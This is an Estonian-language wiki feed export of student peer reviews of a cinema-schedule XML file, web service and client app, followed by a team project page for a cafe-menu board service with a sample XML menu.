Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud &amp;quot;estenglish&amp;quot; kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.&lt;br /&gt;
&lt;br /&gt;
Toomas Soha D21&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Arvustus veebiteenuse klientidele==&lt;br /&gt;
&lt;br /&gt;
Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa  nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;) &lt;br /&gt;
&lt;br /&gt;
Madis Sildaru D32&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++&#039;sis siis, virisen peaasjalikult sortsu kallal :)&lt;br /&gt;
*Sorts on eesti keeles :/&lt;br /&gt;
*Int32.Parse(Request.QueryString[&amp;quot;id&amp;quot;]); stiilis asjad peaks olema try-catch ploki sees.&lt;br /&gt;
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta. &lt;br /&gt;
*Kinokava.aspx.cs: treppimine on vale&lt;br /&gt;
*Response.Redirect(&amp;quot;Kinokava.aspx?id=&amp;quot; + id + &amp;quot;&amp;amp;paev=&amp;quot; + paev + &amp;quot;&amp;amp;kuu=&amp;quot; + kuu + &amp;quot;&amp;amp;aasta=&amp;quot; + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.&lt;br /&gt;
*Kommentaarid puuduvad koodis.&lt;br /&gt;
&lt;br /&gt;
Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)&lt;br /&gt;
&lt;br /&gt;
Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.&lt;br /&gt;
&lt;br /&gt;
Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):&lt;br /&gt;
&lt;br /&gt;
Vähegi suurema projekti puhul ei kasutaks linq&#039;t, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks. &lt;br /&gt;
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).&lt;br /&gt;
&lt;br /&gt;
Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte. &lt;br /&gt;
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.&lt;br /&gt;
&lt;br /&gt;
PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga... &lt;br /&gt;
ei saa öelda, et ma just palju kommentaare oleks leidnud  :)&lt;br /&gt;
&lt;br /&gt;
Priit Siimo&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Teenuse aluseks olev andmebaas on lihtne ja hea. Vajalikud lisaseosed on loodud. Teenuse meetodite hulk on suur ning see on mõistetav, kui tegu on nii rohkelt infot nõudva valdkonna käsitlusega. Kood teenuses on kommenteeritud ja meetodid ise võimalikult erinevates klassides. Lihtne lugeda ja mõista, mis kus asub. Hästi tehtud.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et  millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.&lt;br /&gt;
&lt;br /&gt;
XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.&lt;br /&gt;
&lt;br /&gt;
Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.&lt;br /&gt;
&lt;br /&gt;
Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !&lt;br /&gt;
&lt;br /&gt;
Rauno Rüga, D21&lt;br /&gt;
&lt;br /&gt;
[[User:Rruga|Rruga]]&lt;br /&gt;
&lt;br /&gt;
Kinokavade süsteem on väga huvitav valik. Wikis olev info maht on peaaegu sobiv - puudu jääb ehk vaid detailsemast süsteemiloogikast. Näiteks oleksin huvitatud lugemast täpsemalt kliendi andmevahetuse protokollist.&lt;br /&gt;
&lt;br /&gt;
XML on üldiselt korralik, kuid wikis seisab punkt et süsteem toeta vaid ühte filmi, kas see on iganenud väide või on asi tõesti niimoodi? Mõlemad variandid ei ole eriti kiiduväärt. API on suures plaanis kena, küll aga ei meeldi see &amp;quot;võta&amp;quot; vs. &amp;quot;anna&amp;quot; nimede valik...API meetodite nimed peaks olema ikka nii iseenesestmõistetavad kui vähegi võimalik. &lt;br /&gt;
&lt;br /&gt;
Meeskonnatöö tundub ka huvitav, punktide jaotus on kenasti lineaarne -  hea et aus ollakse. Kuigi liikmeid oli piisavalt ei saadud siiski valmis teise klientrakendusega - võibolla sellepärast et punktide jaotusest tundub et arendajate arv oli projektis siiski väike ja nad lihtsalt ei jõudnud ise kõike valmis koodida.&lt;br /&gt;
&lt;br /&gt;
Need aga on väikesed möödalaskmised, üldiselt on kiiduväärt projekt :)&lt;br /&gt;
&lt;br /&gt;
PS! On tore näha et kasutati agiilseid arendusmeetodeid, eriti just paarisprogrammeerimist.&lt;br /&gt;
&lt;br /&gt;
Tanel Liiv(D22)&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33815</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33815"/>
		<updated>2011-06-06T07:56:20Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte. &lt;br /&gt;
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks &amp;quot;true&amp;quot;, siis pistetakse&lt;br /&gt;
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid&lt;br /&gt;
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;br /&gt;
&lt;br /&gt;
-Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.&lt;br /&gt;
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.&lt;br /&gt;
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult &amp;quot;AnnaTeenus&amp;quot;-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud &amp;quot;estenglish&amp;quot; kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.&lt;br /&gt;
&lt;br /&gt;
Toomas Soha D21&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Arvustus veebiteenuse klientidele==&lt;br /&gt;
&lt;br /&gt;
Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa  nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;) &lt;br /&gt;
&lt;br /&gt;
Madis Sildaru D32&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++&#039;sis siis, virisen peaasjalikult sortsu kallal :)&lt;br /&gt;
*Sorts on eesti keeles :/&lt;br /&gt;
*Int32.Parse(Request.QueryString[&amp;quot;id&amp;quot;]); stiilis asjad peaks olema try-catch ploki sees.&lt;br /&gt;
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta. &lt;br /&gt;
*Kinokava.aspx.cs: treppimine on vale&lt;br /&gt;
*Response.Redirect(&amp;quot;Kinokava.aspx?id=&amp;quot; + id + &amp;quot;&amp;amp;paev=&amp;quot; + paev + &amp;quot;&amp;amp;kuu=&amp;quot; + kuu + &amp;quot;&amp;amp;aasta=&amp;quot; + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.&lt;br /&gt;
*Kommentaarid puuduvad koodis.&lt;br /&gt;
&lt;br /&gt;
Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)&lt;br /&gt;
&lt;br /&gt;
Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.&lt;br /&gt;
&lt;br /&gt;
Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):&lt;br /&gt;
&lt;br /&gt;
Vähegi suurema projekti puhul ei kasutaks linq&#039;t, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks. &lt;br /&gt;
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).&lt;br /&gt;
&lt;br /&gt;
Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte. &lt;br /&gt;
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.&lt;br /&gt;
&lt;br /&gt;
PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga... &lt;br /&gt;
ei saa öelda, et ma just palju kommentaare oleks leidnud  :)&lt;br /&gt;
&lt;br /&gt;
Priit Siimo&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Teenuse aluseks olev andmebaas on lihtne ja hea. Vajalikud lisaseosed on loodud. Teenuse meetodite hulk on suur ning see on mõistetav, kui tegu on nii rohkelt infot nõudva valdkonna käsitlusega. Kood teenuses on kommenteeritud ja meetodid ise võimalikult erinevates klassides. Lihtne lugeda ja mõista, mis kus asub. Hästi tehtud.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et  millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.&lt;br /&gt;
&lt;br /&gt;
XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.&lt;br /&gt;
&lt;br /&gt;
Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.&lt;br /&gt;
&lt;br /&gt;
Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !&lt;br /&gt;
&lt;br /&gt;
Rauno Rüga, D21&lt;br /&gt;
&lt;br /&gt;
[[User:Rruga|Rruga]]&lt;br /&gt;
&lt;br /&gt;
****&lt;br /&gt;
ARVUSTUS PLACEHOLDER&lt;br /&gt;
****&lt;br /&gt;
Tanel Liiv(D22)&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33814</id>
		<title>Meeskond &quot;Hungry Student Food Board&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33814"/>
		<updated>2011-06-06T07:53:41Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Meeskond */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Repositooriumi aadress==&lt;br /&gt;
*http://svn3.xp-dev.com/svn/nomnom/HSFB/&lt;br /&gt;
*Versiooni haldus tarkvara - AnkhSVN või TurtoiseSVN&lt;br /&gt;
&lt;br /&gt;
==Ülesande püstitus==&lt;br /&gt;
&lt;br /&gt;
    * XML fail&lt;br /&gt;
          o XML fail, stiilifail ja skeemifail peavad olema valmis ja wikilehel kirjeldatud hiljemalt 27. veebruar 2011.&lt;br /&gt;
          o Arvamused XML-failide kohta peavad tehtud olema 4. märts 2011&lt;br /&gt;
&lt;br /&gt;
    * Veebiteenus&lt;br /&gt;
          o Veebiteenus peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.&lt;br /&gt;
          o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011&lt;br /&gt;
          o Veebiteenus tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
    * Klientrakendused&lt;br /&gt;
          o Klientrakendused peavad olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.&lt;br /&gt;
          o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011&lt;br /&gt;
          o Klientrakendused tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
    * Meeskonna kokkuvõttev aruanne&lt;br /&gt;
          o Meeskonnatöö kokkuvõttev aruanne peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 8.mai 2011&lt;br /&gt;
          o Arvamused Meeskonnatöö kokkuvõtva aruande ja esitluse kohta tuleb esitada hiljemalt päev enne eksamit&lt;br /&gt;
          o Meeskonna kokkuvõttev aruanne ja töö lõplik tulemus tuleb esitleda!&lt;br /&gt;
&lt;br /&gt;
==Meeskond==&lt;br /&gt;
*Jaan Kruusma(14p)  - projektijuht, analüüs&lt;br /&gt;
*Taavi Ilves(26p) - arendus, veebiteenus, facebook api&lt;br /&gt;
*Tanel Liiv(26p) - arendus, veebiteenus&lt;br /&gt;
*Indrek Kruuser(14p) - arendus, klientrakendus&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktid jagatakse võrdselt&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Idee==&lt;br /&gt;
Idee on luua kohviku menüü haldamise tarkvara. Kasutajal ehk kohvikul on võimalus interneti teel kirjeldada müüki minevad tooted ning tooteid kuvatakse kohvikutes LCD display pealt kui ka Facebooki kaudu kõikide kohvikute menüüsi jälgida. Me lähtume KISS põhimõttest ja hoiame info võimalikult konkreetsena, et kasutaja ei peaks pool päeva toite sisestama või pidevalt kogust arvestama.&lt;br /&gt;
&lt;br /&gt;
==Planeering==&lt;br /&gt;
* Veebiteenuse ehitame IronPythoniga .Net frameworki peale.&lt;br /&gt;
* Arenduskeskond on Visual Studio 2010, millel on IronPython liides.&lt;br /&gt;
* Andmebaasina kasutame MySQL&#039;i, see on kiire ja lihtne üles seada.&lt;br /&gt;
* Kliendipoolse lahenduse teeme Asp.Net&#039;i aines kõrval projektina.&lt;br /&gt;
* Kõik mis kuvatakse kasutajale ehk kohviku kylastajale teeme HTMLi ja JavaScriptiga&lt;br /&gt;
* Andmemudeli diagrammi koostame programmiga QSEE Superlite.&lt;br /&gt;
&lt;br /&gt;
==Veebiteenus==&lt;br /&gt;
*IronPythoni kasutus osutus vaevaliseks, asendasime selle C sharpiga.&lt;br /&gt;
**MVC3 raamistik&lt;br /&gt;
**Razor view engine mugavamaks kirjutamiseks&lt;br /&gt;
**MSSQL 2008 R2 andmebaasi mootoriks&lt;br /&gt;
**Andmete vahekiht LINQ To Entities&lt;br /&gt;
&lt;br /&gt;
*Tagastab kohviku menüü veebiteenuse ID järgi &lt;br /&gt;
*Klienditeenus genereerib igale kohvikule ID&lt;br /&gt;
*auth meetod &lt;br /&gt;
**tuvastatkse kasutaja&lt;br /&gt;
**päring kohviku andmetele&lt;br /&gt;
&lt;br /&gt;
*api meetod &lt;br /&gt;
**auth vastusest kuvab kohviku menüü&lt;br /&gt;
**Päeva menüü xml kujul &lt;br /&gt;
&lt;br /&gt;
*Statistika korjamine &lt;br /&gt;
**Kohviku, meetodi ning IP põhine&lt;br /&gt;
***Võimaldab näha statistikat kasutaja ja kohviku lõikes&lt;br /&gt;
***Võimaldab näha koormust meetodi põhiselt&lt;br /&gt;
**Minimaalne täpsus üks tund&lt;br /&gt;
***Et andmemahud ei kasvaks üle pea&lt;br /&gt;
***Et oleks võimalik koormust hinnata kellaajaliselt&lt;br /&gt;
*[[File:HSFBstats.png]]&lt;br /&gt;
&lt;br /&gt;
===Toodete kuvamine===&lt;br /&gt;
[[File:HSFBVeebiteenus.png]]&lt;br /&gt;
&lt;br /&gt;
==Andmediagramm==&lt;br /&gt;
&lt;br /&gt;
[[File:HSFB.png]]&lt;br /&gt;
&lt;br /&gt;
==Desktop Rakendus==&lt;br /&gt;
*Töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4&lt;br /&gt;
[[File:HFt66.png]]&lt;br /&gt;
&lt;br /&gt;
==Facebook Api==&lt;br /&gt;
*Toitude hääletamine reaalajas&lt;br /&gt;
[[File:HSFBapi.jpg]]&lt;br /&gt;
&lt;br /&gt;
== XML Fail ==&lt;br /&gt;
Highlighted: http://sprunge.us/DPIe?xml&lt;br /&gt;
&lt;br /&gt;
    &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot; ?&amp;gt;&lt;br /&gt;
    &amp;lt;?xml-stylesheet type=&amp;quot;text/xsl&amp;quot; href=&amp;quot;default.xsl&amp;quot;?&amp;gt;&lt;br /&gt;
    &amp;lt;kohvikud xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;&lt;br /&gt;
    xsi:noNamespaceSchemaLocation=&amp;quot;kohvikud.xsd&amp;quot;&amp;gt;&lt;br /&gt;
            &amp;lt;kohvik name=&amp;quot;IT KOHVIK&amp;quot; staatus=&amp;quot;Nummisi pannkooke saadaval&amp;quot;&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;praad&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;kanapraad&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;sinihallitus sokiga&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;100&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;200&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;50%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;34&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
                    &amp;lt;toit tyyp=&amp;quot;supp&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;pilt&amp;gt;&lt;br /&gt;
                                    &amp;lt;url width=&amp;quot;100&amp;quot; height=&amp;quot;100&amp;quot;&amp;gt;http://www.neti.ee/pilt2.jpg&amp;lt;/url&amp;gt;&lt;br /&gt;
                            &amp;lt;/pilt&amp;gt;&lt;br /&gt;
                            &amp;lt;pealkiri&amp;gt;õunasupp&amp;lt;/pealkiri&amp;gt;&lt;br /&gt;
                            &amp;lt;kirjeldus&amp;gt;koorega&amp;lt;/kirjeldus&amp;gt;&lt;br /&gt;
                            &amp;lt;poolhind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;50&amp;lt;/poolhind&amp;gt;&lt;br /&gt;
                            &amp;lt;tervehind valuuta=&amp;quot;eur&amp;quot; rate=&amp;quot;1.0000&amp;quot;&amp;gt;120&amp;lt;/tervehind&amp;gt;&lt;br /&gt;
                            &amp;lt;allahindlus&amp;gt;10%&amp;lt;/allahindlus&amp;gt;&lt;br /&gt;
                            &amp;lt;kehtib&amp;gt;31.03.2011&amp;lt;/kehtib&amp;gt;&lt;br /&gt;
                            &amp;lt;liked&amp;gt;33&amp;lt;/liked&amp;gt;&lt;br /&gt;
                    &amp;lt;/toit&amp;gt;&lt;br /&gt;
